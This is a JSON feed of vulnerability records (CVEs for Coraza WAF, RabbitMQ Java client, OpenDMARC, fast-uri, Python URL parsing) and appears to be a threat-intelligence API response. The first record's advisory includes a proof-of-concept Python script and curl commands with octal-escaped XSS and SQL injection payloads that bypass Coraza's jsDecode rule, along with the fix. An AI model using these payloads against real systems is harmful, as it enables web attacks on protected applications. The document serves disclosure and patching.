{"success":true,"data":{"threats":[{"id":"674d7133-282a-442f-8542-962a07bd4c05","slug":"cve-2026-104774","externalId":"GHSA-pc5q-qfxp-ggqv","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"Coraza: jsDecode Off-by-One in Octal Escape Handling Enables WAF Bypass","description":"### Summary\nThe `t:jsDecode` transformation in Coraza WAF contains an off-by-one error when parsing octal escape sequences. A backslash character was incorrectly included in the octal number buffer, causing `strconv.ParseInt` to fail for every octal escape sequence and return a null byte instead of the decoded value that would normally be returned. This will cause all JS-escaped payloads to be corrupted, thus leading to the bypassing of these WAF rules when WAF rules that rely on `jsDecode` for normalization are enabled.\n\nTherefore, a real-world attack scenario: an attacker could use JavaScript octal escape sequences (`\\ooo`) to encode attack syntax. Although the WAF cannot decode these sequences correctly, the target backend (such as a browser or application) can parse them as expected.\n\n### Details\nVulnerable code: `internal/transformations/js_decode.go:64-70.`\n```go\ncase (i+1 < inputLen) && isodigit(input[i+1]):\n    /* \\OOO (only one byte, \\000 - \\377) */\n    buf := make([]byte, 3)\n    j := 0\n\n    for (i+1+j < inputLen) && (j < 3) {\n        buf[j] = input[i+j]     // this should be `input[i+1+j]`\n        j++\n        if !isodigit(input[i+j]) {\n            break\n        }\n    }\n```\nThis is because, when entering octal mode, the loop variable `i` points to the backslash character `\\`. Before entering octal mode, the pointer **does not** cross the backslash (unlike in the `\\u` and `\\x` cases, where `i+N` is used as the index). Line 65 uses `input[i+j]`, so when `j=0`, the backslash character itself is copied to `buf[0]`. The subsequent call to `strconv.ParseInt(string(buf), 8, 8)` will fail because `\\` is not a valid octal digit; it therefore returns `0` and raises an error (which is silently suppressed by `_`), resulting in the loss of the bytes that were supposed to be decoded.\n\nFor example, Input `\\163`. The loop starts with `j=0`: `buf[0] = input[i+0] = ‘\\’ ` (the backslash itself). The counter `j` is incremented to 1. Since `isodigit(input[i+1]) = isodigit(‘1’)` is true, the loop continues. When `j=1`: `buf[1] = input[i+1] = ‘1’`. The counter increments to 2; `isodigit(input[i+2]) = isodigit(‘6’)` is true. At this point, `j = 2`: `buf[2] = input[i+2] = ‘6’`. The counter increments to 3, at which point the loop condition `j < 3` is no longer satisfied. Final buffer: `buf = [‘\\’, ‘1’, ‘6’]`. The buffer is truncated when `j = 2` (because `buf[0] = ‘\\’ > ‘3’`), leaving `[‘\\’, ‘1’]`.\n\nThis error affects all octal escape sequences (from `\\000` to `\\377`). Each sequence is decoded and displayed as `0x00` instead of the expected value. For example: `\\377` is normally decoded as `\\xff` or 255\n\n```go\n// Bug: buf = ['\\', '3', '7'] to string(buf) = \"\\\\37\"\nnn, _ = strconv.ParseInt(\"\\\\37\", 8, 8)  // nn = 0\n// Correct: buf = ['3', '7', '7'] = \"377\"\nnn, _ = strconv.ParseInt(\"377\", 8, 8)   // nn = 255 = 0xFF\n```\n\n### PoC\n#### Test Environment\nCoraza WAF v3.7.0 is configured to `127.0.0.1:8090`, `SecRuleEngine` is set to `On`, `SecRequestBodyAccess` is set to `On`, and the complete OWASP CRS rule set has been loaded.\n\n#### PoC Executable Script\n```python\n#!/usr/bin/env python3\nimport urllib.request, sys\n\nTARGET = sys.argv[1] if len(sys.argv) > 1 else \"http://127.0.0.1:8090\"\n\nnormal_url = f\"{TARGET}/?q=%3Cscript%3E\"\noctal_url = f\"{TARGET}/?q=%3C%5C163%5C143%5C162%5C151%5C160%5C164%3E\"\n\nprint(f\"[Normal XSS: {normal_url}\")\ntry:\n    urllib.request.urlopen(normal_url)\n    print(\"  Response: 200 \")\nexcept urllib.error.HTTPError as e:\n    print(f\"  Response: {e.code}\")\n\nprint(f\"\\nBypass JS octal-escaped XSS: {octal_url}\")\ntry:\n    urllib.request.urlopen(octal_url)\n    print(\"  Response: 200 (BYPASS)\")\nexcept urllib.error.HTTPError as e:\n    print(f\"  Response: {e.code}\")\n```\noutput:\n```\n  Normal XSS: http://127.0.0.1:8090/?q=%3Cscript%3E\n  Response: 403\n Bypass JS octal-escaped XSS: http://127.0.0.1:8090/?q=%3C%5C163%5C143%5C162%5C151%5C160%5C164%3E\n  Response: 200 (BYPASS)\n```\n\n#### Proof\n- Normal Test\n```bash\n curl -v -s \"http://127.0.0.1:8090/?q=%3Cscript%3E\"\n< HTTP/1.1 403 Forbidden\n< Date: Wed, 01 Jul 2026 16:09:04 GMT\n```\n- Bypass Test\n```\n curl -v -s \"http://127.0.0.1:8090/?q=%3C%5C163%5C143%5C162%5C151%5C160%5C164%3E\"\n< HTTP/1.1 200 OK\n< Date: Wed, 01 Jul 2026 16:09:04 GMT\n< Content-Length: 39\n< Hello world, transaction not disrupted.\n```\n- Log Proof\n```\n2026/07/01 16:09:04 [DEBUG] Transaction finished tx_id=\"<txid>\" is_interrupted=false\n```\n\n### Impact\nAttackers can bypass WAFs that rely on the `t:jsDecode` transformation rule, leading to cross-site scripting (XSS), SQL injection, or other malicious activities.\n#### Real-world attack scenarios:\n**SQL injection bypass.** A rule using `t:jsDecode` received `\\47\\117\\122\\40\\61\\75\\61` (i.e., `' OR 1=1`). This octal string decodes to `\\0...`, so the rule did not match the SQL injection pattern.\n\n### Affected Versions\nCoraza WAF v3.0.0 - v3.7.0\n\n### Resolution\nFixed in `internal/transformations/js_decode.go`'s `\\OOO` octal branch, plus two related issues found and fixed while verifying the patch — the actual shipped fix is broader than the single-line change originally proposed:\n\n1. **The reported off-by-one** (`buf[j] = input[i+j]` → `buf[j] = input[i+1+j]`, with the digit-continuation check updated to `input[i+1+j]` accordingly): confirmed and fixed exactly as described above.\n2. **A related high-byte clamping bug in the same branch**: the decoded value was parsed with `strconv.ParseInt(string(buf), 8, 8)` — a *signed* 8-bit parse. Octal values `\\200`-`\\377` (decimal 128-255) exceed the signed int8 range, so even after fixing the indexing bug, those high bytes would still fail to parse and clamp to `0x7f` instead of their real value. Fixed by parsing as unsigned (`strconv.ParseUint(string(buf), 8, 8)`), so the full `\\000`-`\\377` range decodes correctly.\n3. **A related overflow-saturation bug in the sibling `escapeSeqDecode` transformation** (`internal/transformations/escape_seq_decode.go`), discovered while auditing the same octal-parsing pattern elsewhere in the codebase. Unlike `jsDecode`, `escapeSeqDecode`'s indexing was already correct, but it parsed octal values with `strconv.ParseUint(input[i+1:i+j], 8, 8)` — an 8-bit-wide unsigned parse. Since up to 3 octal digits are consumed (`\\0`-`\\777`, i.e. up to decimal 511), any value above `\\377` (255) overflows 8 bits, causing `strconv.ParseUint` to return an error and a saturated value of `0xFF` for every one of those escapes, rather than correctly wrapping to its low byte (mirroring ModSecurity's `strtol(...) & 0xFF` reference behavior). Fixed by widening the parse to 16 bits (`strconv.ParseUint(input[i+1:i+j], 8, 16)`) before truncating to a byte, so `\\400`-`\\777` now wrap to their correct low-byte value instead of all saturating to `0xFF`.\n\nVerified end-to-end: both PoC payloads from this report now decode correctly —\n`<\\163\\143\\162\\151\\160\\164>` → `<script>`, and `\\47\\117\\122\\40\\61\\75\\61` → `'OR 1=1` — so a downstream WAF rule inspecting the transformed value now sees the real, intended content instead of null bytes or clamped/saturated garbage.\n\nExtensive regression tests were added covering the full octal range (including the `\\200`-`\\377` high-byte range and the `\\400`-`\\777` overflow range for `escapeSeqDecode`), the pre-existing digit-count/truncation edge cases, and both PoC payloads verbatim.\n\n### Mitigation\nUpgrade to the patched release once available. If upgrading isn't immediately possible, the specific code change is:\n\n```go\nfor (i+1+j < inputLen) && (j < 3) {\n    buf[j] = input[i+1+j]\n    j++\n    if i+1+j >= inputLen || !isodigit(input[i+1+j]) {\n        break\n    }\n}\n...\nnn, _ := strconv.ParseUint(string(buf), 8, 8)\n```\n\n### Severity (revised 2026-10-02)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N` (5.8, Medium).\n\nAttack Complexity is Low: JavaScript engines decode legacy octal escapes in non-strict string literals (ECMAScript Annex B), the standard behaviour `jsDecode` emulates, so the request alone triggers the discrepancy. The previous vector (`S:U/C:L/I:L`, 6.5) scored Confidentiality and Integrity separately for what is a single inspection bypass.\n\nImpact metrics follow the convention used across Coraza's WAF-bypass advisories: the vulnerable component is Coraza, but the impact lands on the protected application, so Scope is Changed. The bypass hides a payload from inspection; the application still has to be vulnerable to it, so Integrity is Low and Confidentiality is not scored separately.\n\n_AI involvement in this section: Claude Opus 5.5 (Anthropic), via Claude Code, re-derived the CVSS vector from the project's triage guidance (AGENTS.md, \"CVSS preconditions get verified, not copied from the report\") and drafted this text. A human maintainer (fzipi) chose the `S:C/I:L` impact convention and directed this update._","cveId":"CVE-2026-104774","cvssScore":null,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N","severity":"medium","vendor":"Go","product":"github.com/corazawaf/coraza/v3","affectedVersions":["pkg:golang/github.com/corazawaf/coraza/v3 >= 3.0.0, < 3.8.0"],"cwes":["CWE-172","CWE-193","CWE-693"],"tags":["osv","osv:ghsa-pc5q-qfxp-ggqv","ecosystem:go"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-pc5q-qfxp-ggqv","type":"advisory","title":"OSV GHSA-pc5q-qfxp-ggqv"},{"url":"https://github.com/corazawaf/coraza/security/advisories/GHSA-pc5q-qfxp-ggqv","type":"other","title":"OSV web"},{"url":"https://github.com/corazawaf/coraza/commit/f9b7afdbcedce7ad814663eaee2e342578ea3bb2","type":"other","title":"OSV web"},{"url":"https://github.com/corazawaf/coraza","type":"vendor","title":"OSV package"},{"url":"https://github.com/corazawaf/coraza/releases/tag/v3.8.0","type":"other","title":"OSV web"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T17:45:53.000Z","addedAt":"2026-10-08T18:42:41.937Z","updatedAt":"2026-10-08T18:42:41.937Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-104774","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-104774","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-pc5q-qfxp-ggqv"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-pc5q-qfxp-ggqv"}]},{"id":"42e87940-a70e-4835-90a8-810a6d950eba","slug":"cve-2026-106122","externalId":"CVE-2026-106122","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-106122 — The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes.","description":"The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.36.0, ValueReader.readShortstr decodes malformed UTF-8 bytes into replacement characters that can re-encode beyond the AMQP shortstr limit enforced by ValueWriter.writeShortstr. An attacker who can submit an RPC message with a malformed echoed property can cause reply publication in RpcServer.mainloop() or tutorial-style consumers to throw an unchecked exception before acknowledgement. The broker requeues the message, allowing the same message to disable replacement consumers until the queue is purged. This issue is fixed in version 5.36.0.","cveId":"CVE-2026-106122","cvssScore":6,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":"Maven","product":"com.rabbitmq:amqp-client","affectedVersions":["pkg:maven/com.rabbitmq/amqp-client < 5.36.0"],"cwes":["CWE-172","CWE-248"],"tags":["nvd","status:awaiting-analysis","osv","osv:ghsa-7822-rcf6-97fx","ecosystem:maven"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/rabbitmq/rabbitmq-java-client/commit/b8bd750fa8c90690e859b18d6343b34421309020","type":"other","title":"OSV web"},{"url":"https://github.com/rabbitmq/rabbitmq-java-client/pull/2065","type":"other","title":"OSV web"},{"url":"https://github.com/rabbitmq/rabbitmq-java-client/releases/tag/v5.36.0","type":"other","title":"OSV web"},{"url":"https://github.com/rabbitmq/rabbitmq-java-client/security/advisories/GHSA-7822-rcf6-97fx","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-7822-rcf6-97fx","type":"advisory","title":"OSV GHSA-7822-rcf6-97fx"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106122","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/rabbitmq/rabbitmq-java-client","type":"vendor","title":"OSV package"}],"epssScore":0.00409,"epssPercentile":0.33072,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T19:17:43.467Z","addedAt":"2026-10-06T20:39:30.430Z","updatedAt":"2026-10-08T00:42:50.051Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106122","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-106122","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-7822-RCF6-97FX"}]},{"id":"97e1c659-20a8-4c2e-8211-ca0c693abf95","slug":"cve-2026-100891","externalId":"CVE-2026-100891","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-100891 — A vulnerability has been found in Trusted Domain Project OpenDMARC up to 1.4.2.","description":"A vulnerability has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this issue is the function opendmarc_policy_query_dmarc in the library libopendmarc/opendmarc_policy.c of the component Internationalized Domain Name Handler. Such manipulation leads to encoding error. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.","cveId":"CVE-2026-100891","cvssScore":5.5,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-172"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://vuldb.com/cve/CVE-2026-100891","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/917215","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/410841","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/410841/cti","type":"advisory","title":"cna@vuldb.com"},{"url":"https://weitongli.com/share/opendmarc-ulabel-not-converted.html","type":"advisory","title":"cna@vuldb.com"}],"epssScore":0.00293,"epssPercentile":0.20104,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-28T01:16:28.367Z","addedAt":"2026-09-28T01:50:37.910Z","updatedAt":"2026-10-01T15:50:39.898Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-100891","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-100891","note":"authoritative record"}]},{"id":"79dafa3d-0eb5-4d39-8e0a-b191e91ff4f1","slug":"cve-2026-86818","externalId":"CVE-2026-86818","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-86818 — fast-uri is a dependency-free RFC 3986 URI parser for Node.js, used by Fastify and ajv, that added a mailto scheme parser in version 4.1.3.","description":"fast-uri is a dependency-free RFC 3986 URI parser for Node.js, used by Fastify and ajv, that added a mailto scheme parser in version 4.1.3. In versions 4.1.3 and 4.1.4, the mailto parser compares each query field name to the reserved names to, subject, and body while the name is still percent-encoded, and decodes it only when storing it as a generic header, so a percent-encoded spelling of a reserved field name is not recognized as that field at parse time but is re-emitted as the literal field name when the parsed URI is serialized. An application that validates, logs, or displays the recipient list from the first parse and then serializes the URI and sends it can silently gain an attacker-chosen recipient, and the subject and body fields can be smuggled across the same roundtrip. The issue is fixed in fast-uri 4.1.5, and users should upgrade to 4.1.5 or later. As a workaround, do not act on a mailto URI that fast-uri has re-serialized without first decoding and re-validating its recipient, subject, and body fields.","cveId":"CVE-2026-86818","cvssScore":4.8,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","severity":"medium","vendor":"npm","product":"fast-uri","affectedVersions":["pkg:npm/fast-uri >= 4.1.3, < 4.1.5"],"cwes":["CWE-172","CWE-436"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-jvvf-x445-j334","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://cna.openjsf.org/security-advisories.html","type":"other","title":"OSV web"},{"url":"https://github.com/fastify/fast-uri/security/advisories/GHSA-jvvf-x445-j334","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-jvvf-x445-j334","type":"advisory","title":"OSV GHSA-jvvf-x445-j334"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-86818","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/fastify/fast-uri/commit/f40a88f33e684a46faec3f5b820bcbb1e85add64","type":"other","title":"OSV web"},{"url":"https://github.com/fastify/fast-uri","type":"vendor","title":"OSV package"},{"url":"https://github.com/fastify/fast-uri/releases/tag/v4.1.5","type":"other","title":"OSV web"}],"epssScore":0.00253,"epssPercentile":0.15369,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-15T11:17:12.453Z","addedAt":"2026-09-15T11:50:35.372Z","updatedAt":"2026-09-30T01:54:27.312Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-86818","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-86818","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-JVVF-X445-J334"}]},{"id":"f229dd49-7a21-4010-aadd-68ae5b2956ba","slug":"cve-2019-10160","externalId":"CVE-2019-10160","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2019-10160 — A security regression of CVE-2019-9636 was discovered in python since commit d537ab0ff9767ef024f26246899728f0116b1ec3 affecting versions 2.7, 3.5, …","description":"A security regression of CVE-2019-9636 was discovered in python since commit d537ab0ff9767ef024f26246899728f0116b1ec3 affecting versions 2.7, 3.5, 3.6, 3.7 and from v3.8.0a4 through v3.8.0b1, which still allows an attacker to exploit CVE-2019-9636 by abusing the user and password parts of a URL. When an application parses user-supplied URLs to store cookies, authentication credentials, or other kind of information, it is possible for an attacker to provide specially crafted URLs to make the application locate host-related information (e.g. cookies, authentication data) and send them to a different host than where it should, unlike if the URLs had been correctly parsed. The result of an attack may vary based on the application.","cveId":"CVE-2019-10160","cvssScore":9.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"critical","vendor":"python","product":"python","affectedVersions":[">= 2.7.0, < 2.7.17",">= 3.5.0, < 3.5.8",">= 3.6.0, < 3.6.9",">= 3.7.0, < 3.7.4","3.8.0","7.0","7.6","8.0","9.0","15.0","15.1","29","30","31","12.04","14.04","16.04","18.04","19.04","4.0"],"cwes":["CWE-172","CWE-522"],"tags":["nvd","status:modified"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10160","https://github.com/python/cpython/commit/250b62acc59921d399f0db47db3b462cd6037e09","https://github.com/python/cpython/commit/8d0ef0b5edeae52960c7ed05ae8a12388324f87e","https://github.com/python/cpython/commit/f61599b050c621386a3fc6bc480359e2d3bb93de","https://github.com/python/cpython/commit/fd1771dbdd28709716bd531580c40ae5ed814468","https://python-security.readthedocs.io/vuln/urlsplit-nfkc-normalization2.html","https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10160","https://github.com/python/cpython/commit/250b62acc59921d399f0db47db3b462cd6037e09","https://github.com/python/cpython/commit/8d0ef0b5edeae52960c7ed05ae8a12388324f87e","https://github.com/python/cpython/commit/f61599b050c621386a3fc6bc480359e2d3bb93de","https://github.com/python/cpython/commit/fd1771dbdd28709716bd531580c40ae5ed814468","https://python-security.readthedocs.io/vuln/urlsplit-nfkc-normalization2.html"],"references":[{"url":"http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00042.html","type":"advisory","title":"Mailing List"},{"url":"http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html","type":"advisory","title":"Mailing List"},{"url":"https://access.redhat.com/errata/RHSA-2019:1587","type":"advisory","title":"Third Party Advisory"},{"url":"https://access.redhat.com/errata/RHSA-2019:1700","type":"advisory","title":"Third Party Advisory"},{"url":"https://access.redhat.com/errata/RHSA-2019:2437","type":"advisory","title":"Third Party Advisory"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10160","type":"patch","title":"Issue Tracking"},{"url":"https://github.com/python/cpython/commit/250b62acc59921d399f0db47db3b462cd6037e09","type":"patch","title":"Patch"},{"url":"https://github.com/python/cpython/commit/8d0ef0b5edeae52960c7ed05ae8a12388324f87e","type":"patch","title":"Patch"},{"url":"https://github.com/python/cpython/commit/f61599b050c621386a3fc6bc480359e2d3bb93de","type":"patch","title":"Patch"},{"url":"https://github.com/python/cpython/commit/fd1771dbdd28709716bd531580c40ae5ed814468","type":"patch","title":"Patch"},{"url":"https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E","type":"advisory","title":"secalert@redhat.com"},{"url":"https://lists.debian.org/debian-lts-announce/2019/06/msg00022.html","type":"advisory","title":"Mailing List"},{"url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00011.html","type":"advisory","title":"Mailing List"},{"url":"https://lists.debian.org/debian-lts-announce/2020/08/msg00034.html","type":"advisory","title":"Mailing List"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2ORNTF62QPLMJXIQ7KTZQ2776LMIXEKL/","type":"advisory","title":"secalert@redhat.com"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/44TS66GJMO5H3RLMVZEBGEFTB6O2LJJU/","type":"advisory","title":"secalert@redhat.com"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4X3HW5JRZ7GCPSR7UHJOLD7AWLTQCDVR/","type":"advisory","title":"secalert@redhat.com"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E2HP37NUVLQSBW3J735A2DQDOZ4ZGBLY/","type":"advisory","title":"secalert@redhat.com"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ER6LONC2B2WYIO56GBQUDU6QTWZDPUNQ/","type":"advisory","title":"secalert@redhat.com"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HQEQLXLOCR3SNM3AA5RRYJFQ5AZBYJ4L/","type":"advisory","title":"secalert@redhat.com"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JCPGLTTOBB3QEARDX4JOYURP6ELNNA2V/","type":"advisory","title":"secalert@redhat.com"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KRYFIMISZ47NTAU3XWZUOFB7CYL62KES/","type":"advisory","title":"secalert@redhat.com"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M34WOYCDKTDE5KLUACE2YIEH7D37KHRX/","type":"advisory","title":"secalert@redhat.com"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NF3DRDGMVIRYNZMSLJIHNW47HOUQYXVG/","type":"advisory","title":"secalert@redhat.com"},{"url":"https://python-security.readthedocs.io/vuln/urlsplit-nfkc-normalization2.html","type":"patch","title":"Patch"},{"url":"https://security.netapp.com/advisory/ntap-20190617-0003/","type":"advisory","title":"Third Party Advisory"},{"url":"https://usn.ubuntu.com/4127-1/","type":"advisory","title":"Third Party Advisory"},{"url":"https://usn.ubuntu.com/4127-2/","type":"advisory","title":"Third Party Advisory"},{"url":"http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00042.html","type":"advisory","title":"Mailing List"},{"url":"http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html","type":"advisory","title":"Mailing List"},{"url":"https://access.redhat.com/errata/RHSA-2019:1587","type":"advisory","title":"Third Party Advisory"},{"url":"https://access.redhat.com/errata/RHSA-2019:1700","type":"advisory","title":"Third Party Advisory"},{"url":"https://access.redhat.com/errata/RHSA-2019:2437","type":"advisory","title":"Third Party Advisory"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10160","type":"patch","title":"Issue Tracking"},{"url":"https://github.com/python/cpython/commit/250b62acc59921d399f0db47db3b462cd6037e09","type":"patch","title":"Patch"},{"url":"https://github.com/python/cpython/commit/8d0ef0b5edeae52960c7ed05ae8a12388324f87e","type":"patch","title":"Patch"},{"url":"https://github.com/python/cpython/commit/f61599b050c621386a3fc6bc480359e2d3bb93de","type":"patch","title":"Patch"},{"url":"https://github.com/python/cpython/commit/fd1771dbdd28709716bd531580c40ae5ed814468","type":"patch","title":"Patch"},{"url":"https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"},{"url":"https://lists.debian.org/debian-lts-announce/2019/06/msg00022.html","type":"advisory","title":"Mailing List"},{"url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00011.html","type":"advisory","title":"Mailing List"},{"url":"https://lists.debian.org/debian-lts-announce/2020/08/msg00034.html","type":"advisory","title":"Mailing List"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2ORNTF62QPLMJXIQ7KTZQ2776LMIXEKL/","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/44TS66GJMO5H3RLMVZEBGEFTB6O2LJJU/","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4X3HW5JRZ7GCPSR7UHJOLD7AWLTQCDVR/","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E2HP37NUVLQSBW3J735A2DQDOZ4ZGBLY/","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ER6LONC2B2WYIO56GBQUDU6QTWZDPUNQ/","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HQEQLXLOCR3SNM3AA5RRYJFQ5AZBYJ4L/","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JCPGLTTOBB3QEARDX4JOYURP6ELNNA2V/","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KRYFIMISZ47NTAU3XWZUOFB7CYL62KES/","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M34WOYCDKTDE5KLUACE2YIEH7D37KHRX/","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"},{"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NF3DRDGMVIRYNZMSLJIHNW47HOUQYXVG/","type":"advisory","title":"af854a3a-2127-422b-91ae-364da2661108"},{"url":"https://python-security.readthedocs.io/vuln/urlsplit-nfkc-normalization2.html","type":"patch","title":"Patch"},{"url":"https://security.netapp.com/advisory/ntap-20190617-0003/","type":"advisory","title":"Third Party Advisory"},{"url":"https://usn.ubuntu.com/4127-1/","type":"advisory","title":"Third Party Advisory"},{"url":"https://usn.ubuntu.com/4127-2/","type":"advisory","title":"Third Party Advisory"}],"epssScore":0.05227,"epssPercentile":0.92305,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2019-06-07T18:29:00.280Z","addedAt":"2026-10-07T20:39:29.822Z","updatedAt":"2026-10-07T20:39:29.822Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2019-10160","note":"ingested from NVD"},{"label":"CVE 